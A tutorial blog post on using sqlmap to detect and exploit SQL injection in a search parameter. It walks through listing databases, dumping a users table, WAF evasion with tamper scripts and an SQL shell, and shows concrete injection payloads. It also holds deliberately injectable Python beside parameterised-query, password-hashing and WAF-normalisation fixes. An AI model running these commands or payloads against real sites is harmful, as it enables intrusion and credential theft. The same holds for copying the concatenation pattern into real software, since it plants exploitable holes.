SQL injection is the nastiest vulnerability there is. It allows an attacker to interfere with the queries that an application makes to its database. A successful SQL injection attack may leak data such as administrator credentials and payment details. Your data will end up on the black market if the attackers want to profit from it. Even worse, it can allow the attackers to run a shell on your server and take control of everything they can reach.

This vulnerability is still relevant today because many systems worldwide still do not sanitize user input.
You might want to test your own system to see whether it can defend against SQL injection. No system is safe, by the way 😅. If your system manages to defend against SQL injection, attackers will try hundreds of other ways to get in.
Okay. The easy way to test for SQL injection is to use a pentest tool called sqlmap.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

Installation
For Mac, you can install directly from Homebrew
For others, you can download the latest from zipball or tarball.
After a successful install, when you type sqlmap or python3 sqlmap.py, the output should look like the one below.

Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
Usage (Happy Flow)
The usage is very straightforward actually. You can simply type sqlmap -hh to see all the arguments. They are already well explained, and I can't show all of them here.
Please use your own website URL. Any URL you test is your own responsibility.
Let’s get started.
Checking if a parameter is exploitable
For example, some websites have a search parameter that is used to query the database, such as http://example.com.my/search?filter=1. You are not sure whether the filter parameter is secure or not. You can just run:
sqlmap -u "http://example.com.my/search?filter=1" -p "filter"
The output would be something like this:
[14:50:42] [INFO] testing connection to the target URL
[14:50:42] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:50:42] [INFO] testing if the target URL content is stable
[14:50:43] [INFO] target URL content is stable
[14:50:43] [INFO] testing if GET parameter 'filter' is dynamic
[14:50:43] [INFO] GET parameter 'filter' appears to be dynamic
[14:50:43] [INFO] heuristic (basic) test shows that GET parameter 'filter' might be injectable (possible DBMS: 'MySQL')
[14:50:43] [INFO] heuristic (XSS) test shows that GET parameter 'filter' might be vulnerable to cross-site scripting (XSS) attacks
[14:50:44] [INFO] testing for SQL injection on GET parameter 'filter'
.....
.....
.....
---
Parameter: filter (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: filter=1 AND 1450=1450

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: filter=1 AND GTID_SUBSET(CONCAT(0x716b7a7a71,(SELECT (ELT(8537=8537,1))),0x71717a7071),8537)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: filter=1 AND (SELECT 9652 FROM (SELECT(SLEEP(5)))FTDn)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: filter=1 UNION ALL SELECT CONCAT(0x716b7a7a71,0x4b54775259664e73714b7674557976445053435567684f484d5547784a647a4274434b4e6d686774,0x71717a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[15:00:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10, PHP
back-end DBMS: MySQL >= 5.5
....
....
Oh no! The filter parameter is exploitable. That output shows that the parameter is injectable. The moment it says injectable, you know you are already f$$ked if someone else found it first.
Using the injectable parameter, let's continue and get the list of databases.
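The boolean-based blind payload in the output above (filter=1 AND 1450=1450) only works because the parameter is pasted into the SQL text. The following is an added example, not code from the original post, that shows the broken pattern beside the fix. It uses an in-memory SQLite table with constructed rows and a hypothetical products schema; the boolean check mirrors what sqlmap does when it compares a true condition with a false one.

```python
import sqlite3

# Constructed sample data standing in for the table behind
# /search?filter=1 (hypothetical schema, not the site from the post).
SAMPLE_ROWS = [
    (1, 1, "keyboard"),
    (2, 1, "mouse"),
    (3, 2, "monitor"),
]


def make_db():
    """In-memory SQLite database with a small products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, category INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def vulnerable_search(conn, filter_value):
    """The broken pattern: the request parameter is concatenated into the
    SQL string, so whatever the client sends becomes part of the WHERE clause."""
    sql = "SELECT name FROM products WHERE category = " + filter_value
    return [row[0] for row in conn.execute(sql)]


def hardened_search(conn, filter_value):
    """The fix: validate the type, then bind the value as a parameter so the
    database never parses user input as SQL."""
    category = int(filter_value)  # raises ValueError for anything but an integer
    sql = "SELECT name FROM products WHERE category = ?"
    return [row[0] for row in conn.execute(sql, (category,))]


def boolean_blind_differs(search, conn):
    """What sqlmap's boolean-based blind check looks for: does a true
    condition and a false condition appended to the parameter produce
    different responses? If yes, the parameter is injectable."""
    true_case = search(conn, "1 AND 1450=1450")
    false_case = search(conn, "1 AND 1450=1451")
    return true_case != false_case


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable endpoint injectable:", boolean_blind_differs(vulnerable_search, conn))
    try:
        boolean_blind_differs(hardened_search, conn)
    except ValueError as exc:
        print("hardened endpoint rejected the payload:", exc)
```

The hardened version rejects the payload outright because a search filter that is supposed to be a number should never contain letters or spaces; for free-text parameters the same rule applies, minus the int() check: bind, never concatenate.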
Fetching Databases
Since sqlmap stores the session, we can reuse the earlier command and it will immediately try to fetch the databases using the previously found payload.
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" --dbs
The output would be something like this:
...
...
...
[15:10:47] [INFO] fetching database names
available databases [240]:
[*] information_schema
[*] database1
[*] database2
[*] database3
[*] database4
...
...
Hmmm 🤔. 240 databases are listed. That's a lot! How about we take a look at database1?
Fetching Tables
By using the same command,
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" -D database1 --tables
Let's see the output:
[15:38:00] [INFO] fetching tables for database: 'database1'
[15:38:00] [INFO] resumed: 'users'
[15:38:00] [INFO] resumed: 'permissions'
[15:38:00] [INFO] resumed: 'products'
[15:38:00] [INFO] resumed: 'user'
[15:38:00] [INFO] resumed: 'user_token'
Database: database1
[5 tables]
+-------------------+
| users             |
| permissions       |
| products          |
| token_access      |
| user_token        |
+-------------------+
Table users? Looks tempting. How about we dump all the users and see if we can get the administrator user?
Fetching Columns and Dumping Tables
You might want to know the list of columns for the users table:
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" -D database1 -T users --columns
But I prefer to dump the table:
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" -D database1 -T users --dump
Output:
Database: database1
Table: users
[4 entries]
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1  | admin    | admin123 |
| 2  | admin2   | Qw123@12 |
| 3  | john     | John233  |
| 4  | doe      | Pos1233  |
+----+----------+----------+
Tada~~ The list of users is in your hands now! Usually the passwords are hashed, so all you need to do is crack them.
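The dump above shows passwords stored in plaintext, which turns a single injectable parameter into working logins. As an added example, not from the original post, here is what the users table looks like when passwords are stored as salted, slow hashes (PBKDF2-HMAC-SHA256 from Python's hashlib). The user rows are constructed, reusing the usernames from the dump, and the iteration count is an assumed value to be tuned for your own hardware.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # PBKDF2 work factor; assumed value, tune for your hardware

# Constructed users matching the usernames in the dump above. The plaintext
# passwords exist here only to show that they never reach the table.
SAMPLE_USERS = [
    ("admin", "admin123"),
    ("admin2", "Qw123@12"),
    ("john", "John233"),
    ("doe", "Pos1233"),
]


def hash_password(password, salt=None):
    """Return a self-describing record: pbkdf2_sha256$<iters>$<salt hex>$<hash hex>.
    A fresh 16-byte salt per user means equal passwords get different records."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(stored, candidate):
    """Recompute the hash with the stored salt and iteration count and compare
    in constant time."""
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), hash_hex)


def build_users_table(users):
    """The users table as it should be stored: (username, record) rows
    with no plaintext password anywhere."""
    return [(name, hash_password(pw)) for name, pw in users]


def table_leaks_plaintext(rows, users):
    """Check a dump: is any stored value equal to a real password?"""
    secrets = {pw for _, pw in users}
    return any(stored in secrets for _, stored in rows)


if __name__ == "__main__":
    rows = build_users_table(SAMPLE_USERS)
    for name, record in rows:
        print(name, record[:40] + "...")
    print("dump leaks plaintext:", table_leaks_plaintext(rows, SAMPLE_USERS))
```

With this in place a dumped users table still has to be cracked one slow hash at a time, and weak choices like admin123 remain the weak point, which is why the hashing goes together with a password policy rather than replacing it.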
Bypassing WAF/IPS
I believe a lot of applications sit behind a WAF. The WAF inspects incoming requests and blocks any malicious ones. How to bypass it? sqlmap has a --tamper argument which obfuscates the payload it sends so that the WAF does not recognise it.
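To see what a tamper script does to a request, and why a WAF rule has to normalise input before matching, here is an added example that is not from the original post or from sqlmap's own code. The parameter values are constructed: the second one is what the space2comment tamper produces from the first (every space becomes an empty inline comment). A naive rule that keys on spaces misses the tampered form; the same rule applied after stripping comments catches it. The last check flags sqlmap's default User-Agent prefix, which is exactly what --random-agent hides, so it is only a weak signal on its own.

```python
import re

# Constructed request parameter values, not captured from the site in the post.
PLAIN_PAYLOAD = "1 AND 1450=1450"
TAMPERED_PAYLOAD = "1/**/AND/**/1450=1450"  # space2comment output for PLAIN_PAYLOAD
BENIGN_VALUE = "1"

# A naive WAF rule of the kind a tamper slips past: it expects the SQL
# keyword and the comparison to be separated by real whitespace.
NAIVE_RULE = re.compile(r"\b(AND|OR)\s+\S+=\S+", re.IGNORECASE)


def naive_waf_blocks(value):
    """Match the raw parameter value as received."""
    return NAIVE_RULE.search(value) is not None


def normalize_sql(value):
    """Undo common obfuscation before matching: replace inline comments with
    a space and collapse runs of whitespace."""
    no_comments = re.sub(r"/\*.*?\*/", " ", value, flags=re.DOTALL)
    return re.sub(r"\s+", " ", no_comments).strip()


def normalized_waf_blocks(value):
    """Same rule, but applied to the normalized form of the value."""
    return NAIVE_RULE.search(normalize_sql(value)) is not None


def looks_like_sqlmap_agent(user_agent):
    """sqlmap's default User-Agent starts with 'sqlmap/'; --random-agent
    replaces it, so treat this as corroborating evidence only."""
    return user_agent.startswith("sqlmap/")


if __name__ == "__main__":
    for value in (BENIGN_VALUE, PLAIN_PAYLOAD, TAMPERED_PAYLOAD):
        print(repr(value), "naive:", naive_waf_blocks(value),
              "normalized:", normalized_waf_blocks(value))
    # Constructed header values for illustration.
    print(looks_like_sqlmap_agent("sqlmap/1.7#stable (https://sqlmap.org)"))
    print(looks_like_sqlmap_agent("Mozilla/5.0"))
```

Real WAF engines do considerably more normalisation than this (URL decoding, case folding, other comment and encoding styles), and the point of the tamper list is that each script targets one such gap; the durable fix is still the parameterised query, with the WAF as a second layer.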
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" --tamper=space2comment
There are several tamper scripts and they can be combined; you can refer to the sqlmap documentation for the list. It is also recommended to add a random User-Agent to the request:
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" --tamper=space2comment --random-agent
Extras
If you prefer to write your own SQL commands, you can use the SQL shell:
sqlmap -u "http://example.com.my/search?filter=1" -p "filter" --sql-shell
The output:
[16:14:54] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> Select * from users;
That's all guys. Thanks for your time~~ 😬